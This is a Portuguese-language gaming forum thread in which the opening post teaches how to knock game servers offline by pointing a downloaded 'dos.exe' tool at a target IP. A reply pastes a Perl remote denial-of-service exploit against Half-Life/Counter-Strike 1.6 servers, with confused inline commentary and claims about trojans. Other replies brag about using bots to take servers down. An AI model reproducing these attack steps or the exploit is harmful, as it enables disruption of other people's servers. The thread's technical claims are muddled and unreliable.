![]() |
Derrubando server com DDoS
O download está no fim do tutorial !
1º Baixe o arquivo e extraia: [Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar] 2º Vá até a pasta do arquivo, lá vai ter um arquivo chamado "dos", crie um atalho dele: [Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar] 3º Clique com o botão direito do mouse no atalho, e clique em "propriedades": [Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar] 4º Pegue o IP do servidor e coloque nas propriedades: [Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar] Pronto, agora execute o arquivo dos.exe ( o atalho ) e o server irá cair OBS: Já existem servers que tem Anti-DDoS ! Download: [Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar] Scan: [Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar] Créditos: Guilherme Raucci PS: TEM 96% DE CHANCE DE FUNCIONAR EM VARIOS SERVER PQ MUITOS SERVER NÃO TEM ANTI-DDoS ENTÃO AINDA FUNFA ;) |
Amigo, é proibido postar MSN/E-mail. Tópico Reportado!
Leia as [Somente Usuários Registrados Podem Visualizar os Links Desta PáginaClique aqui para se Registrar] ! |
Bom Tuto.
Mas prefiro usar o ICQ pra derrubar servidores.! (6) Tenho muitos BOTs que ficam on lá. Muhahaha! ^^ |
Po cara desculpe, mas esse metodo e antigo
no cs existe um sistema chamado vac security que detecta esse sistema desde a v19 ou o steam versao 2003 Olha isso #!/usr/bin/perl # Server must not be running steam. /str0ke # Half-Life engine remote DoS exploit # bug found by Firestorm # tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server use IO::Socket; die "usage: ./csdos <host>" unless $ARGV[0]; (Aki e a parte onde o sistema se connecta a um host $host=$ARGV[0]; if (fork()) { econnect($host); } else { econnect($host); }; exit; sub econnect($) { my $host=$_[0]; my $sock = new IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015' ,Proto=>'udp'); aki e onde esta acionada a porta padrao de um servidor hlds ou ingame die "Could not create socket: $!\n" unless $sock; $cmd="\xff\xff\xff\xff"; syswrite $sock, $cmd."getchallenge"; sysread $sock,$b,65535; print $b,"\n"; @c=split(/ /,$b); $c2=$c[1]; $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a3 6258af1bb64ed866538c9db76\"\"\\\"\0\0"; print '>',$q,"\n"; syswrite $sock, $q; sysread $sock,$b,65535; print $b,"\n";Gerador de conflitos em rede - aki onde o sistema abre portas ghosts em qualquer roteador e onde um trogeam se hospeda em seu pc sleep 1; close $sock; } nao use isso contem um trogeam e um paralit.c Meu primo uma vez q me mostrou - obs ele e formado em sistema da informaçao e pos graduado em rede OS BETAS SAO FODA By STiFler Fodao Espero contribuir mais:rungun: |
acho que topic trancado :x '
se nao funfa mas. |
Mesmo antigo é bem temido. Eu tava jogando Counter-Strike em um server Non-Steam, e chegou um carinha que foi banido, ameaçando o ADM do server, e perguntando se ele tinha Anti-DDoS. E o ADM ficou com tanto medo que deixou ele ficar jogando ;$, ou seja, é bem temido esse treco aê.
|
o macabrin deve jogar e deve conhecer.
se nao funfou cara :/' ou da erro pkausa do VAC. intaum ta ferrado o programa |
kkkkkkkkkkkkkkkkkkkkk
tipo ele ainda funfa mas ele abre uma porta e envia um troyjean Horse e um paralite server pra vc e pro q vc que sacanear kkkkkkkkkkk q derrubar usa Inject Ftp ou ate o icq:laugh: tipo o cara q fez esse sistema nao ia bota ele de mao beijada por exemplo um xiter de cs super simple wall "ssw" tem um arquivo ssw.dll q tem um "worm" eles colocam os programas e colocam virus pra zuar e sao virus q vc so acha no code |
Macabrin Não FLOD,USE O BOTÃO EDIT
============= ainda está funfando sim eu testei ake.. podem baixar que ainda está funcionando tranquilo.. |
cara vc nao entendeu nadinha
ele funfa mas o coder em dll esta programado para enviar troyjan para o server e pra vc cara eu saco muito de programaçao "sem me gabar" eu em breve vou corrigir o seu post ai vc pode editalo a vontade eu testei e derrubei meu proprio server olha la em cima o coder dll dele e ve o q tra de vermelho:err: |
| Horários baseados na GMT -3. Agora são 06:18 AM. |